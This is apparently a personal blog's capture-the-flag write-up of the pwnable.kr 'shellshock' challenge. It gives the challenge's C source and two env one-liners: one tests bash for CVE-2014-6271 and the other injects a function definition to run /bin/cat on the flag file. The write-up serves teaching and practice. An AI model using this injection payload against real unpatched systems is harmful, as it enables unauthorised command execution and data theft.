Abdallah Elshinbary

Abdallah Elshinbary

Malware Analysis & Reverse Engineering Adventures.

Pwnable.kr - shellshock

less than 1 minute read

Challenge description:

Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure :)

#include <stdio.h>
int main(){
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

The challenge represents the very well known vulnerability CVE-2014-6271 also known as shellshock. I won’t go into details of how it works (see the references for more info).

we are given a bash binary at our working directory, to test if it’s vulnerable to shellshock you can run the following command:

shellshock@pwnable:~$ env x='() { :;}; echo TEST' ./bash -c :
TEST

It printed TEST which means this bash is vulnerable to shellshock, It will exit silently if bash has been patched.

The challenge is just a call to bash -c so we can treat it as ./bash and pass to it what we want to execute (/bin/cat flag).

Solution:

shellshock@pwnable:~$ env x='() { :;}; /bin/cat flag' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!

References:

https://fedoramagazine.org/shellshock-how-does-it-actually-work/